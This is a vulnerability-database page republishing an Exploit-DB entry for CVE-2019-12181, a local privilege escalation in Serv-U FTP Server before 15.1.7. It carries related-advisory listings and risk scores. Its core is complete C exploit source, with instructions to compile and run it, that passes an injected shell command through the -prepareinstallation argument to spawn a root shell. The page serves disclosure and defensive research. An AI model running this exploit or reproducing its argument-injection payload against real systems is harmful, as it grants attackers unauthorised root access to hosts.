Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)

🗓️ 18 Jun 2019 00:00:00Reported by Guy LevinType

exploitdb🔗 www.exploit-db.com👁 178 Views

Serv-U FTP Server < 15.1.7 Local Privilege Escalatio

Reporter	Title	Published	Views	Family All 19
GithubExploit	Exploit for CVE-2002-0526	12 Mar 202611:02	–	githubexploit
0day.today	Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Exploit	18 Jun 201900:00	–	zdt
0day.today	Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit	2 Jul 201900:00	–	zdt
0day.today	Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2) Exploit	26 Jul 201900:00	–	zdt
ATTACKERKB	Serv-U FTP Server prepareinstallation Privilege Escalation	17 Jun 201900:00	–	attackerkb
Circl	CVE-2019-12181	18 Jun 201900:00	–	circl
CVE	CVE-2019-12181	17 Jun 201915:16	–	cve
Cvelist	CVE-2019-12181	17 Jun 201915:16	–	cvelist
Exploit DB	Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)	3 Jul 201900:00	–	exploitdb
Exploit DB	Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)	13 Jan 201900:00	–	exploitdb

/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{       
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}

18 Jun 2019 00:00Current

8.7High risk

Vulners AI Score8.7

CVSS 26.5

CVSS 3.18.8

EPSS0.52927

Serv-U FTP Server &lt; 15.1.7 - Local Privilege Escalation (1)

Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)